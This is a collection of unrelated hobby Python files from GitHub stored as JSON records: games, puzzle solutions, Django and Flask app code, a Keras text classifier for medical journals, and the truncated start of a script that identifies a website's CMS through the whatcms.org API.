hangedman(letters_wrong) #Calls the graphic array and passes the number of letters the user got wrong in it. The numbers passed are used as an index to the array.\r\n        print(\"\".join(clue)); #Shows the letters the user got correct in the clue(_i__).\r\n        print(\"Guesses\", letters_tried); #Displays the letters the user already tried.\r\n\r\n        if letters_wrong == tries: #If the user doesn't have any turns left the game is over.\r\n            print(\"Game Over.\");\r\n            print(\"The word was: \",word);\r\n            computer_score += 1; #Adds 1 score to the computer total.\r\n            break; #Breaks out of the game loop.\r\n        if \"\".join(clue) == word: #If the clue matches the correct word the player wins.\r\n            print(\"You win!\");\r\n            print(\"The word was: \", word);\r\n            player_score += 1; #Adds 1 score to the player/user total.\r\n            break; #Breaks out of the game loop.\r\n    return play_again() #Returns function that asks user if they wish to play again or not.\r\n\r\ndef guess_letter() :\r\n    letter = input(\"Take a guess at our mystery word: \")\r\n    letter = letter.strip(); \r\n    letter = letter.lower() #Makes the user input lowercase; the result must be assigned back because strings are immutable.\r\n    return letter #returns the processed user input.\r\n\r\ndef play_again() :\r\n    answer = input(\"Would you like to play again? y/n: \")\r\n    if answer in (\"y\", \"Y\", \"yes\", \"Yes\", \"Of course!\"):\r\n        return answer #If a value is returned the game will continue.\r\n    else:\r\n        print(\"Thank you very much for playing our game. 
See you next time! \\n\")\r\n    \r\ndef scores() : #Called once the game is completed.\r\n    global player_score, computer_score #Brings the score vars into scope.\r\n    print(\"HIGH SCORES\")\r\n    print(\"Player: \", player_score)\r\n    print(\"Computer: \",computer_score)\r\n\r\nif __name__ == '__main__' : #Allows the code to be run from the command line without starting automatically on import.\r\n    start()","repo_name":"Enrico-Samuels2200/My-Python-Projects","sub_path":"Hangman/Hangman.py","file_name":"Hangman.py","file_ext":"py","file_size_in_byte":6605,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"18140981688","text":"from point import Point\n\nclass Line():\n    '''Line from pointA to pointB\n    leftmost point is pointA, and rightmost point is pointB\n    '''\n    def __init__(self, pointA, pointB):\n        if(pointA.x <= pointB.x):\n            self.pointA = pointA\n            self.pointB = pointB\n        else:\n            self.pointA = pointB\n            self.pointB = pointA\n        if(pointB.x - pointA.x != 0):\n            self.slope = (pointB.y - pointA.y) / (pointB.x - pointA.x)\n        else:\n            self.slope = 9999999 #large sentinel standing in for the infinite slope of a vertical line\n        self.intercept = pointB.y - self.slope*pointB.x\n\n    def checkPointWithinLineSegmentIfPointIsOnLine(self, point):\n        print(\"IT IS WITHIN THIS LINE\")\n        if(self.slope >= 0): #Positive Slope\n            return (self.pointA.x <= point.x and point.x <= self.pointB.x) and (self.pointA.y <= point.y and point.y <= self.pointB.y)\n        else: #Negative Slope\n            return (self.pointA.x <= point.x and point.x <= self.pointB.x) and (\n                self.pointA.y >= point.y and point.y >= self.pointB.y)\n    def evaluate(self, x):\n        return x*self.slope + self.intercept
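\n\nif __name__ == '__main__':\n    # Editor-added usage sketch (hedged): assumes Point is constructed as\n    # Point(x, y) and exposes .x/.y attributes, which is how this class reads it.\n    demo = Line(Point(0, 0), Point(2, 4))\n    print(demo.slope)       # 2.0\n    print(demo.evaluate(3)) # 2.0 * 3 + 0.0 = 6.0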
    \"\"\")\n#def about(request):\n# return HttpResponse(\"\"\"

    That's My Portfolio

    \"\"\")\ndef index(request):\n return render(request,'index.html')\ndef about(request):\n return render(request, 'about.html')\ndef contact(request):\n return render(request,'contact.html')\n\n #return HttpResponse(\"Home\")\ndef analyze(request):\n #get the text\n djtext=request.POST.get('text', 'default')\n #check box value\n removepunc = request.POST.get('removepunc', 'off')\n fullcaps=request.POST.get('fullcaps','off')\n newlineremover = request.POST.get('newlineremover', 'off')\n extraspaceremover = request.POST.get('extraspaceremover', 'off')\n charactercounter=request.POST.get('charactercounter', 'off')\n #print(removepunc,\"\\n\",djtext)\n #analyze the text\n #analyzed=djtext\n if removepunc==\"on\":\n punctuations = '''!()-[]{};:'\"\\,<>./?@#$%^&*_~'''\n analyzed=\"\"\n for char in djtext:\n if char not in punctuations:\n analyzed=analyzed+char\n params={'purpose':'Removed Punctuations', 'analyzed_text':analyzed}\n djtext=analyzed\n #return render(request, 'analyze.html', params)\n if fullcaps==\"on\":\n analyzed=\"\"\n for char in djtext:\n analyzed+=char.upper()\n params = {'purpose': 'Changed to Uppercase', 'analyzed_text': analyzed}\n djtext=analyzed\n #return render(request, 'analyze.html', params)\n if newlineremover=='on':\n analyzed = \"\"\n for char in djtext:\n if char!=\"\\n\" and char!=\"\\r\":\n analyzed += char\n params = {'purpose': 'Removed NewLines', 'analyzed_text': analyzed}\n djtext=analyzed\n #return render(request, 'analyze.html', params)\n if extraspaceremover=='on':\n analyzed = \"\"\n for index,char in enumerate(djtext):\n if not(djtext[index]==\" \" and djtext[index+1]==\" \"):\n analyzed += char\n params = {'purpose': 'Removed NewLines', 'analyzed_text': analyzed}\n djtext=analyzed\n #return render(request, 'analyze.html', params)\n if charactercounter=='on':\n analyzed = 0\n for index,char in enumerate(djtext):\n if not(djtext[index]==\" \"):\n analyzed += 1\n params = {'purpose': 'Character Count', 'analyzed_text': analyzed}\n djtext=analyzed\n\n return render(request,'analyze.html',params)","repo_name":"dynamitedeeps/textutils","sub_path":"textutils/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2656,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"71561393709","text":"from flask_wtf import FlaskForm\nfrom wtforms import StringField, SubmitField\nfrom wtforms.validators import DataRequired, StopValidation\nfrom twitter import search_user\n\n\nclass ValidateId(object):\n \"\"\"\n Validates that the user Twitters id exists. 
This validator will stop the\n validation chain on error.\n :param message:\n Error message to raise in case of a validation error.\n \"\"\"\n field_flags = ('required', )\n\n def __init__(self, message=None):\n self.message = message\n\n def __call__(self, form, field):\n if not search_user(field.data):\n if self.message is None:\n self.message = field.gettext('Wrong twitter user.')\n\n field.errors[:] = []\n raise StopValidation(self.message)\n\n\nclass UserIdForm(FlaskForm):\n username = StringField('User id', validators=[DataRequired(), ValidateId()])\n submit = SubmitField('Create map')\n","repo_name":"LiiaDulher/friends_map","sub_path":"forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":921,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"3904543952","text":"from django.conf import settings\nfrom django.db import models\nfrom django.db.models.signals import post_save\n\nfrom .utils import code_generator\n\n# Create your models here.\n\nUser = settings.AUTH_USER_MODEL\n\nclass MemberManager(models.Manager):\n\tdef toggle_follow(self, request_user, username_to_toggle):\n\t\tmember_ = Member.objects.get(user__username__iexact=username_to_toggle)\n\t\tuser = request_user\n\t\tis_following = False\n\t\tif user in member_.followers.all():\n\t\t\tmember_.followers.remove(user)\n\t\telse:\n\t\t\tmember_.followers.add(user)\n\t\t\tis_following = True\n\t\treturn member_, is_following\n\nclass Member(models.Model):\n\tuser \t\t\t= models.OneToOneField(User) #user.all()\n\tfollowers\t\t= models.ManyToManyField(User, related_name='is_following', blank=True) #users.follower.all()\n\t#following\t\t= models.ManyToManyField(User, related_name='following', blank=True) #users.following.all()\n\tactivation_key\t= models.CharField(max_length=120, blank=True, null=True)\n\tactivated\t\t= models.BooleanField(default=False)\n\ttimestamp \t\t= models.DateTimeField(auto_now_add=True)\n\tupdated\t\t\t= models.DateTimeField(auto_now=True)\n\n\tobjects = MemberManager()\n\n\tdef __str__(self):\n\t\treturn self.user.username\n\n\tdef send_activation_email(self):\n\t\tif not self.activated:\n\t\t\tself.activation_key = code_generator()\n\t\t\tself.save()\n\t\t\tsent_mail = False\n\t\t\treturn sent_mail\n\t\t\t#send mail\n\ndef post_save_user_receiver(sender, instance, created, *args, **kwargs):\n\tif created:\n\t\tmember, is_created = Member.objects.get_or_create(user=instance)\n\t\tdefault_user_member = Member.objects.get_or_create(user__id=1)[0] #user__usernam=\n\t\t#assign new signups as follower of firstuser (user__id=1), since it is a tuple, use [0]\n\t\tdefault_user_member.followers.add(instance)\n\t\t#assign to follow a new signup using firstuser\n\t\tmember.followers.add(default_user_member.user)\n\t\tmember.followers.add(2)\n\npost_save.connect(post_save_user_receiver, sender=User)\t\t","repo_name":"raintapper/inniin","sub_path":"src/members/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1909,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"38059430848","text":"f = open(\"input.txt\", \"r\").readlines()\n\ntotal_ribbon = 0\n\nfor line in f:\n dimensions = line.split('x')\n dimensions = [float(dimensions[0]), float(dimensions[1]), float(dimensions[2])]\n\n wrap = 0\n bow = 1\n crossedMaxDimension = False\n\n for dimension in dimensions:\n if dimension != max(dimensions) or crossedMaxDimension == True:\n wrap += 2 * dimension\n else:\n 
crossedMaxDimension = True\n        bow *= dimension\n\n    total_ribbon += wrap + bow\n\nprint('The elves should order ' + str(total_ribbon) + ' feet of ribbon.')\n","repo_name":"huggo-42/advent_of_code.2015","sub_path":"day-2/solution_part2.py","file_name":"solution_part2.py","file_ext":"py","file_size_in_byte":588,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"69939043629","text":"import string\n\ndef getRucksacksPriority(lines,alphabet):\n    totalPriority=0\n    for line in lines:\n        splittedString = [line[:len(line)//2],line[len(line)//2:].strip()]\n        for i in splittedString[0]:\n            if(getDuplicated(i,splittedString)):\n                totalPriority+=alphabet.index(i)+1\n                break\n    return totalPriority\n\ndef getGroupPriority(lines,alphabet):\n    \n    groupsPriority = 0\n    groupString = []\n    for i, line in enumerate(lines, start=1):\n        groupString.append(line.strip())\n        if(i%3==0):\n            groupsPriority+=alphabet.index(getDuplicatedInGroup(i,groupString))+1\n            groupString = []\n\n    return groupsPriority \n\ndef getDuplicatedInGroup(i,groupString):\n    for ch in groupString[0]:\n        for j in groupString[1]:\n            if(ch==j):\n                for k in groupString[2]:\n                    if(ch==k):\n                        return ch\n\ndef getDuplicated(i,splittedString):\n    for j in splittedString[1]:\n        if(i==j):\n            return True\n\nalphabet = list(string.ascii_lowercase+string.ascii_uppercase)\n\n
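# Editor-added sanity check (hedged; not in the original solution): the puzzle's\n# priority rule is a-z -> 1-26 and A-Z -> 27-52, e.g. 'p' -> 16 and 'L' -> 38.\nassert alphabet.index('p') + 1 == 16\nassert alphabet.index('L') + 1 == 38\n\n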
f = open(\"./input.txt\", \"r\")\nlines = f.readlines()\n \nprint(\"Solution 1:\",getRucksacksPriority(lines,alphabet))\nprint(\"Solution 2:\",getGroupPriority(lines,alphabet))\n","repo_name":"GabriRDiaz/AdventOfCode22","sub_path":"Day3/day3.py","file_name":"day3.py","file_ext":"py","file_size_in_byte":1338,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"14712366775","text":"\"\"\"\nLearn how to handle input and output, employ the random number generator, \nand write the output to a file.\nMany people are fond of interactive learning. In this project, you will learn \nhow to write an application that can facilitate solving arithmetic operations in \na quick manner. The application will generate a mathematical expression for a user \nto solve. Implement various levels of difficulty and let the application save the \nresults and show the progress of learning.\n\"\"\"\nimport random\n\n\ndef generate_simple_ops() -> tuple:\n    return random.randint(2, 9), random.choice([\"+\", \"-\", \"*\"]), random.randint(2, 9)\n\n\ndef generate_integral_square() -> int:\n    return random.randint(11, 29)\n\n\ndef menu():\n    print(\"Which level do you want? Enter a number:\")\n    print(\"1 - simple operations with numbers 2-9\")\n    print(\"2 - integral squares of 11-29\")\n\n\ndef integer_square():\n    n = 5\n    mark = 0\n    while n > 0:\n        n -= 1\n        task = generate_integral_square()\n        while True:\n            print(task)\n            square = input()\n            if square.isdigit():\n                break\n            else:\n                print(\"Wrong format! Try again.\")\n        if (task ** 2) == int(square):\n            print(\"Right!\")\n            mark += 1\n        else:\n            print(\"Wrong!\")\n    return mark\n\n\ndef simple_operations():\n    n = 5\n    mark = 0\n    while n > 0:\n        n -= 1\n        a, operand, b = generate_simple_ops()\n        print(f\"{a} {operand} {b}\")\n        while True:\n            answer = input()\n            if answer.isdigit():\n                break\n            elif answer.startswith('-') and answer[1:].isdigit():  #only accept a real negative integer, not any string starting with '-'\n                break\n            else:\n                print(\"Incorrect format.\")\n        result = int(answer)\n        if operand == \"+\":\n            if result == a + b:\n                print(\"Right!\")\n                mark += 1\n            else:\n                print(\"Wrong!\")\n        if operand == \"-\":\n            if result == a - b:\n                print(\"Right!\")\n                mark += 1\n            else:\n                print(\"Wrong!\")\n        if operand == \"*\":\n            if result == a * b:\n                print(\"Right!\")\n                mark += 1\n            else:\n                print(\"Wrong!\")\n    return mark\n\n\ndef save_file(name, mark, level=None):\n    with open('results.txt', 'a') as f:\n        if level == 1:\n            result = f\"{name}: {mark}/5 in level {level} (simple operations with numbers 2-9).\"\n        else:\n            result = f\"{name}: {mark}/5 in level {level} (integral squares of 11-29).\"\n        f.write(result + '\\n')\n\n\ndef main():\n    mark = 0\n    while True:\n        menu()\n        choice = int(input())\n        if choice == 1 or choice == 2:\n            break\n        else:\n            print(\"Incorrect format.\")\n\n    if choice == 1:\n        mark = simple_operations()\n    if choice == 2:\n        mark = integer_square()\n\n    save_or_not = input(f\"Your mark is {mark}/5. Would you like to save the result? Enter yes or no.\\n\")\n    if save_or_not in [\"yes\", \"YES\", \"y\", \"Yes\"]:\n        name = input(\"What is your name?\\n\")\n        save_file(name, mark, choice)\n        print('The results are saved in \"results.txt\".')\n\n\nif __name__ == '__main__':\n    main()","repo_name":"biramendoye/python-exercices","sub_path":"src/arithmetic.py","file_name":"arithmetic.py","file_ext":"py","file_size_in_byte":3237,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"17089084085","text":"class Solution:\n    def assignBikes(self, workers: List[List[int]], bikes: List[List[int]]) -> List[int]:\n        n, m = len(workers), len(bikes)\n        dist = []\n        for i in range(n):\n            for j in range(m):\n                dist.append([abs(workers[i][0] - bikes[j][0]) + abs(workers[i][1] - bikes[j][1]), i, j])\n        dist.sort()\n        row, col = set(), set()\n        ans = [0]*n\n        co = 0\n        for wt, r, c in dist:\n            if r not in row and c not in col:\n                ans[r] = c\n                row.add(r)\n                col.add(c)\n                co += 1\n            \n            if co == n:\n                return ans\n        return ans","repo_name":"mrprashantkumar/LeetCode-Submissions-Python","sub_path":"campus-bikes/campus-bikes.py","file_name":"campus-bikes.py","file_ext":"py","file_size_in_byte":677,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"39738241088","text":"import pickle\r\nfrom keras.layers import LSTM, Input, Embedding, Dense, Dropout, Masking\r\nfrom keras.models import Model\r\nimport numpy as np\r\nimport os\r\nfrom random import shuffle\r\nimport matplotlib.pyplot as plt\r\nfrom keras.callbacks import TensorBoard, ModelCheckpoint\r\nfrom keras.preprocessing.sequence import pad_sequences\r\nimport re\r\nfrom nltk.corpus import stopwords\r\n\r\nmaxlen = 487\r\n# 38892\r\nvocab_num = 38892\r\nembed_dim = 512\r\nepochs = 50\r\nbatch_size = 100\r\nsave_dir = './models/medical/model_01/'\r\n\r\nlabels = ['Arthroskopie', 'Bundesgesundheitsblatt', 'DerAnaesthesist', 'DerChirurg', 'DerGynaekologe', 'DerHautarzt',\r\n          'DerInternist', 'DerNervenarzt', 'DerOpthalmologe', 'DerOrthopaede', 'DerPathologe', 'DerRadiologe',\r\n          'DerSchmerz', 'DerUnfallchirurg', 'DerUrologeA', 
'EthikInDerMedizin', 'ForumDerPsychoanalyse',\r\n          'Gefaesschirurgie', 'Herz', 'Herzschrittmachertherapie', 'HNO', 'IntensiveMedizin',\r\n          'KlinischeNeuroradiologie', 'ManuelleMedizin', 'MedizinischeKlinik', 'MonatsschriftKinderheilkunde',\r\n          'MundKieferGesichtschirurgie', 'Notfall+Rettungsmedizin', 'OperativeOrthopaedie', 'PerinatalMedizin',\r\n          'Psychotherapeut', 'Rechtsmedizin', 'Reproduktionsmedizin', 'Strahlentherapie+Onkologie',\r\n          'Trauma+Berufskrankheit', 'ZfuerGerontologie+Geriatrie', 'ZfuerHerzThoraxGefaesschirurgie',\r\n          'ZfuerKardiologie', 'ZfuerRheumatologie']\r\nstopwords_eng = stopwords.words('english')\r\n\r\n\r\ndef split_data():\r\n\twith open('wordlist_label.pkl', 'rb') as f:\r\n\t\tx = pickle.load(f)\r\n\t\ty = x[1]\r\n\t\tx = x[0]\r\n\t\tx = [[w for w in s if w not in stopwords_eng]for s in x]\r\n\t\tf.close()\r\n\t\tlength = [len(s) for s in x]\r\n\t\tprint(max(length))\r\n\tz = list(zip(x, y))\r\n\tz.sort(key=lambda t:t[1])\r\n\ttrain = []\r\n\ttest = []\r\n\tcn = [0 for l in labels]\r\n\tfor l in y:\r\n\t\tcn[labels.index(l)] += 1\r\n\r\n\tfor i in range(len(labels)):\r\n\t\ts = cn[i] // 5\r\n\t\tif s == 0:\r\n\t\t\ts = 1\r\n\t\tn = 0\r\n\t\tfor xy in z:\r\n\t\t\tif xy[1] == labels[i]:\r\n\t\t\t\tif n < s:\r\n\t\t\t\t\ttest.append(xy)\r\n\t\t\t\telse:\r\n\t\t\t\t\ttrain.append(xy)\r\n\t\t\t\tn += 1\r\n\ttrain_x = [xy[0] for xy in train]\r\n\ttrain_y = [xy[1] for xy in train]\r\n\ttest_x = [xy[0] for xy in test]\r\n\ttest_y = [xy[1] for xy in test]\r\n\tprint(train_x[0])\r\n\twith open('./dataset/medical_splited_wordlists.pkl', 'wb') as f:\r\n\t\tpickle.dump([train_x, train_y, test_x, test_y], f)\r\n\t\tf.close()\r\n\r\n\r\ndef process_data():\r\n\twith open('./dataset/medical_splited_wordlists.pkl', 'rb') as f:\r\n\t\ttrain_x, train_y, test_x, test_y = pickle.load(f)\r\n\t\tf.close()\r\n\r\n\t# y = [labels.index(label) for label in y]\r\n\t# y = np.eye(39)[y]\r\n\t# x = np.array(x)\r\n\t# return 1\r\n\t# print(x.shape)\r\n\t# print(y.shape)\r\n\t# pickle.dump([x, y], open('./dataset/medical_unsplited', 'wb'))\r\n\r\n\treturn 1\r\n\r\n\r\ndef load_data():\r\n\ttrain_x, train_y, test_x, test_y = pickle.load(open('./dataset/medical_splited_wordlists.pkl', 'rb'))\r\n\ttrain_x, test_x = pickle.load(open('./dataset/medical_word_vecs.pkl', 'rb'))\r\n\r\n\tul = ['Notfall+Rettungsmedizin', 'MedizinischeKlinik', 'Strahlentherapie+Onkologie', 'Trauma+Berufskrankheit',\r\n\t\t 'PerinatalMedizin', 'EthikInDerMedizin', 'OperativeOrthopaedie', 'KlinischeNeuroradiologie', 'DerInternist',\r\n\t\t 'Psychotherapeut', 'Gefaesschirurgie', 'Rechtsmedizin', 'Arthroskopie', 'ZfuerHerzThoraxGefaesschirurgie',\r\n\t\t 'Herzschrittmachertherapie', 'Bundesgesundheitsblatt', 'Reproduktionsmedizin', 'Herz', 'ManuelleMedizin',\r\n\t\t 'ForumDerPsychoanalyse']\r\n\ttrain_y = train_y.tolist()\r\n\ttest_y = test_y.tolist()\r\n\ttrain_x = train_x.tolist()\r\n\ttest_x = test_x.tolist()\r\n\r\n\ttrain_x = pad_sequences(train_x, maxlen=maxlen, dtype='float16')\r\n\ttest_x = pad_sequences(test_x, maxlen=maxlen, dtype='float16')\r\n\ttrain_y = [labels.index(label) for label in train_y]\r\n\ttest_y = [labels.index(label) for label in test_y]\r\n\ttrain_y = np.eye(len(labels))[train_y]\r\n\ttest_y = np.eye(len(labels))[test_y]\r\n\treturn train_x, train_y, test_x, test_y\r\n\r\n\r\ndef create_model():\r\n\tx = Input(shape=(maxlen, embed_dim))\r\n\tembed = Masking(mask_value=0.)(x)\r\n\tlstm = LSTM(256, dropout=0.25)(embed)\r\n\tdense_1 = Dense(64, activation='relu')(lstm)\r\n\tdense_1 = Dropout(0.2)(dense_1)\r\n\tdense_2 = Dense(32, activation='relu')(dense_1)\r\n\tdense_2 = Dropout(0.25)(dense_2)\r\n\ty = Dense(len(labels), activation='softmax')(dense_2)\r\n\tmodel = Model(x, y)\r\n\treturn model
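\r\n\r\n\r\ndef _editor_shape_check():\r\n\t# Hedged, editor-added sketch (not part of the original training script):\r\n\t# it only checks the I/O contract of create_model() on dummy input of\r\n\t# shape (batch, maxlen, embed_dim); the real pickled data is not touched.\r\n\tmodel = create_model()\r\n\tdummy = np.zeros((2, maxlen, embed_dim), dtype='float32')\r\n\tpreds = model.predict(dummy)\r\n\tassert preds.shape == (2, len(labels))\r\n\treturn preds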
\r\n\r\n\r\ndef get_model(is_train=True):\r\n\ttrain_x, train_y, test_x, test_y = load_data()\r\n\tprint(train_x.shape, train_y.shape)\r\n\tprint(test_x.shape, test_y.shape)\r\n\r\n\tmodel = create_model()\r\n\tmodel.summary()\r\n\r\n\timport tensorflow as tf\r\n\timport keras.backend.tensorflow_backend as KTF\r\n\r\n\tconfig = tf.ConfigProto()\r\n\tconfig.gpu_options.allow_growth = True  # allocate GPU memory on demand instead of reserving it all\r\n\tsess = tf.Session(config=config)\r\n\tKTF.set_session(sess)  # set the Keras session\r\n\r\n\tif is_train:\r\n\t\tif not os.path.exists(save_dir):\r\n\t\t\tos.makedirs(save_dir)\r\n\t\tmodel.compile('adam', loss='categorical_crossentropy', metrics=['accuracy'])\r\n\t\tcheckpoint = ModelCheckpoint(filepath=save_dir + '_trained_best_model.h5', monitor='val_acc',\r\n\t\t\t\t\t\t\t\t\tsave_best_only=True, mode='max', period=1)\r\n\t\ttensorboard = TensorBoard(log_dir=save_dir + '/log')\r\n\t\tcallback_lists = [tensorboard, checkpoint]  # callbacks must be passed as a list\r\n\r\n\t\thistory = model.fit(train_x, train_y, validation_data=[test_x, test_y], batch_size=batch_size,\r\n\t\t\t\t\t\t\tepochs=epochs, callbacks=callback_lists)\r\n\t\tmodel.save_weights(save_dir + '_trained_model.h5')\r\n\r\n\t\tfig = plt.figure()  # create a new figure\r\n\t\tplt.plot(history.history['acc'], label='training acc')\r\n\t\tplt.plot(history.history['val_acc'], label='val acc')\r\n\t\tplt.title('model accuracy')\r\n\t\tplt.ylabel('accuracy')\r\n\t\tplt.xlabel('epoch')\r\n\t\tplt.legend(loc='lower right')\r\n\t\tfig.savefig(save_dir + '_acc.png')\r\n\t\tfig = plt.figure()\r\n\t\tplt.plot(history.history['loss'], label='training loss')\r\n\t\tplt.plot(history.history['val_loss'], label='val loss')\r\n\t\tplt.title('model loss')\r\n\t\tplt.ylabel('loss')\r\n\t\tplt.xlabel('epoch')\r\n\t\tplt.legend(loc='upper right')\r\n\t\tfig.savefig(save_dir + '_loss.png')\r\n\telse:\r\n\t\tmodel.load_weights(save_dir + '_trained_model.h5')\r\n\treturn model, [train_x, train_y, test_x, test_y]\r\n\r\n\r\ndef test_model(model, test_x, test_y):\r\n\ty_pre = model.predict(test_x)\r\n\ty_pre = y_pre.tolist()\r\n\ty_pre = [s.index(max(s)) for s in y_pre]\r\n\ttest_y = test_y.tolist()\r\n\ttest_y = [s.index(max(s)) for s in test_y]\r\n\r\n\tp = []\r\n\tr = []\r\n\tf1 = []\r\n\ttp_sum = 0\r\n\tfp_sum = 0\r\n\tfn_sum = 0\r\n\tfor cat in range(len(labels)):\r\n\t\ttp = 0\r\n\t\ttn = 0\r\n\t\tfp = 0\r\n\t\tfn = 0\r\n\t\tfor pre, true in zip(y_pre, test_y):\r\n\t\t\tif true == cat:\r\n\t\t\t\tif pre == true:\r\n\t\t\t\t\ttp += 1\r\n\t\t\t\telse:\r\n\t\t\t\t\tfn += 1\r\n\t\t\telse:\r\n\t\t\t\tif pre == cat:\r\n\t\t\t\t\tfp += 1\r\n\t\t\t\telse:\r\n\t\t\t\t\ttn += 1\r\n\t\t# print(tp, tn, fp, fn)\r\n\t\tif tp + fp == 0:\r\n\t\t\tprecision = 0\r\n\t\telse:\r\n\t\t\tprecision = tp / (tp + fp)\r\n\t\tif tp + fn == 0:\r\n\t\t\trecall = 0\r\n\t\telse:\r\n\t\t\trecall = tp / (tp + fn)\r\n\t\tif precision + recall == 0:\r\n\t\t\tfeature1 = 0\r\n\t\telse:\r\n\t\t\tfeature1 = 2 * precision * recall / (precision + recall)\r\n\t\tp.append(precision)\r\n\t\tr.append(recall)\r\n\t\tf1.append(feature1)\r\n\r\n\t\ttp_sum += tp\r\n\t\tfp_sum += fp\r\n\t\tfn_sum += fn\r\n\r\n\tfor i in range(len(labels)):\r\n\t\tprint(labels[i], p[i], r[i], f1[i])\r\n\t# p = [precision for precision in p if precision != 0]\r\n\t# r = [recall for recall in r if recall != 0]\r\n\t# f1 = [feature1 
for feature1 in f1 if feature1 != 0]\r\n\tprint('macro', np.mean(p), np.mean(r), np.mean(f1))\r\n\tp_micro = tp_sum / (tp_sum + fp_sum)\r\n\tr_micro = tp_sum / (tp_sum + fn_sum)\r\n\tf1_micro = 2 * p_micro * r_micro / (p_micro + r_micro)\r\n\tprint('micro', p_micro, r_micro, f1_micro)\r\n\treturn p, r, f1\r\n\r\n\r\nif __name__ == '__main__':\r\n\t# split_data()\r\n\t#\r\n\tmodel, data = get_model(is_train=True)\r\n\t# model, data = get_model(is_train=False)\r\n\ttrain_x, train_y, test_x, test_y = data\r\n\ttest_model(model, test_x, test_y)\r\n\r\n\t# train_x, train_y, test_x, test_y = load_data()\r\n\t# train_y = [l.index(1) for l in train_y.tolist()]\r\n\t# test_y = [l.index(1) for l in test_y.tolist()]\r\n\t# cnt = [0 for i in labels]\r\n\t# for l in train_y:\r\n\t# \tcnt[l] += 1\r\n\t# cnt2 = [0 for i in labels]\r\n\t# for l in test_y:\r\n\t# \tcnt2[l] += 1\r\n\t# s = [a / (a + b) for a, b in zip(cnt2, cnt)]\r\n\t# print(cnt)\r\n\t# print(cnt2)\r\n\t# print(s)\r\n\r\n","repo_name":"zouyishan/code","sub_path":"LSTM RNN/medical.py","file_name":"medical.py","file_ext":"py","file_size_in_byte":8181,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"41345362851","text":"from django.contrib import admin\nfrom django.contrib.auth.views import LogoutView\nfrom django.urls import path\nfrom tasks.models import Task\nfrom tasks.views import (\n    GenericAllTaskView,\n    GenericCompletedTaskView,\n    GenericTaskCompleteView,\n    GenericTaskCreateView,\n    GenericTaskDeleteView,\n    GenericTaskDetailView,\n    GenericTaskUpdateView,\n    GenericTaskView,\n    UserCreateView,\n    UserLoginView,\n    session_storage_view,\n)\n\nurlpatterns = [\n    path(\"admin/\", admin.site.urls),\n    path(\"tasks/\", GenericTaskView.as_view()),\n    path(\"create-task/\", GenericTaskCreateView.as_view()),\n    path(\"delete-task//\", GenericTaskDeleteView.as_view()),\n    path(\"complete_task//\", GenericTaskCompleteView.as_view()),\n    path(\"completed_tasks/\", GenericCompletedTaskView.as_view()),\n    path(\"all_tasks/\", GenericAllTaskView.as_view()),\n    path(\"update-task/\", GenericTaskUpdateView.as_view()),\n    path(\"detail-task/\", GenericTaskDetailView.as_view()),\n    path(\"sessiontest\", session_storage_view),\n    path(\"user/signup\", UserCreateView.as_view()),\n    path(\"user/login\", UserLoginView.as_view()),\n    path(\"user/logout\", LogoutView.as_view()),\n]\n","repo_name":"noel-jose/GDC-Level-6-Milestone","sub_path":"task_manager/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1180,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"2582809862","text":"#!/usr/bin/python3\n#-*- coding:utf-8 -*-\n\nimport time\nfrom datetime import datetime\nimport requests\nimport json\nimport argparse\nimport sys\nimport platform\nimport shutil\nimport os\nimport random\n\n\nbanner_font = '''\n\n        Author : Dxvistxr\n        CMS Identificator With API => \\033[1;96mhttps://whatcms.org\\033[00m\n        2019\n\n        '''\n\ndef check_platform():\n    if 'Linux' not in platform.platform():\n        sys.exit('[*] Linux Required !')\n\ndef check_python_version():\n    version_py = sys.version[0]\n    if '3' not in version_py:\n        print(banner_font)\n        sys.exit('\\033[1;91m[*] Please Run cmsid.py with python3')\n\ndef check_internet():\n    try:\n        print('[*] Checking Internet Connection...')\n        resp = requests.get('https://www.google.com')\n        print('[*] Internet : \\033[1;92mFound !')\n\n    except Exception as error_internet:\n        print('[*] Internet Not \\033[1;91mFound 
!')\n sys.exit('\\033[1;91m[!] Exiting')\n\n\ndef send_requests(key,target):\n try:\n check_internet()\n r = requests.get('https://whatcms.org/APIEndpoint/Detect?key=%s&url=%s' % (key,target))\n content_requests = r.text\n obj = json.loads(content_requests)\n req = obj['request']\n req_web = obj['request_web']\n code = obj['result']['code']\n msg = obj['result']['msg']\n id = obj['result']['id']\n name = obj['result']['name']\n confidence = obj['result']['confidence']\n cms_url = obj['result']['cms_url']\n t = datetime.now().strftime('%H:%M:%S')\n print('\\033[1;92m[\\033[1;94m*\\033[1;92m] \\033[1;96m Requests Sent At \\033[1;92m%s\\033[00m' % (t))\n print('\\033[1;92m[\\033[1;94m*\\033[1;92m] \\033[1;93mRequests SuccessFull !\\033[00m')\n print('\\033[1;92m[\\033[1;94m*\\033[1;92m] \\033[1;92mRequest : \\033[1;96m%s' % (req))\n print('\\033[1;92m[\\033[1;94m*\\033[1;92m] \\033[1;92mRequests Web : \\033[1;96m%s' % (req_web))\n print('\\033[1;92m[\\033[1;94m*\\033[1;92m] \\033[1;92mStatus Code : \\033[1;96m%s' % (code))\n print('\\033[1;92m[\\033[1;94m*\\033[1;92m] \\033[1;92mCMS Status : \\033[1;96m%s' % (msg))\n print('\\033[1;92m[\\033[1;94m*\\033[1;92m] \\033[1;92mID Status : \\033[1;96m%s' % (id))\n print('\\033[1;92m[\\033[1;94m*\\033[1;92m] \\033[1;92mCMS 